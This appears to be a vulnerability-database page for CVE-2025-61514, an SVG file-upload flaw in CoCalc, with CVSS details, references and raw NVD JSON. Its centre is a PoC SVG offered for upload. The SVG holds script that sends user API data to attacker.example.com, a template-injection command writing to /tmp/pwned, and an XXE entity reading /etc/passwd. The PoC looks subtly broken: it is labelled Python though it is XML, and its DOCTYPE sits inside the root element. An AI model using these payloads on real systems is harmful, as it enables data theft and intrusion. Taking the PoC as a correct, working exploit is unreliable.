CVE-2025-61514

Description

An arbitrary file upload vulnerability in SageMath, Inc CoCalc before commit 0d2ff58 allows attackers to execute arbitrary code via uploading a crafted SVG file.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SageMath CoCalc < commit 0d2ff58

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-61514 PoC: Malicious SVG file for arbitrary code execution -->
<!-- Upload this file to CoCalc to trigger the vulnerability -->
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
  <!-- Embedded JavaScript for client-side execution -->
  <script type="application/ecmascript">
    <![CDATA[
      // Exfiltrate data or perform malicious actions
      var xhr = new XMLHttpRequest();
      xhr.open("GET", "/api/v1/user/info", true);
      xhr.onreadystatechange = function() {
        if (xhr.readyState == 4) {
          // Send stolen data to attacker's server
          var img = new Image();
          img.src = "https://attacker.example.com/steal?data=" + btoa(xhr.responseText);
        }
      };
      xhr.send();
      
      // Attempt server-side template injection via SVG metadata
      var payload = "{{system('id > /tmp/pwned')}}";
      var meta = document.createElement("metadata");
      meta.textContent = payload;
      document.documentElement.appendChild(meta);
    ]]>
  </script>
  <!-- XXE payload for potential server-side exploitation -->
  <!DOCTYPE svg [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
  ]>
  <text x="10" y="50" font-size="14">&xxe;</text>
  <!-- Visual content to make the file appear legitimate -->
  <rect x="0" y="0" width="200" height="200" fill="lightblue"/>
  <circle cx="100" cy="100" r="50" fill="red"/>
  <text x="60" y="105" font-size="16" fill="white">POC</text>
</svg>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61514
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61514
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61514/
[4] VulDB https://vuldb.com/cve/CVE-2025-61514
[5] https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-61514
[6] https://github.com/sagemathinc/cocalc
[7] https://github.com/sagemathinc/cocalc/commit/0d2ff5890a3ae62e941aad8a5884dd765b7e98fc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61514", "sourceIdentifier": "[email protected]", "published": "2025-10-16T19:15:33.500", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file upload vulnerability in SageMath, Inc CoCalc before commit 0d2ff58 allows attackers to execute arbitrary code via uploading a crafted SVG file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-61514", "source": "[email protected]"}, {"url": "https://github.com/sagemathinc/cocalc", "source": "[email protected]"}, {"url": "https://github.com/sagemathinc/cocalc/commit/0d2ff5890a3ae62e941aad8a5884dd765b7e98fc", "source": "[email protected]"}]}}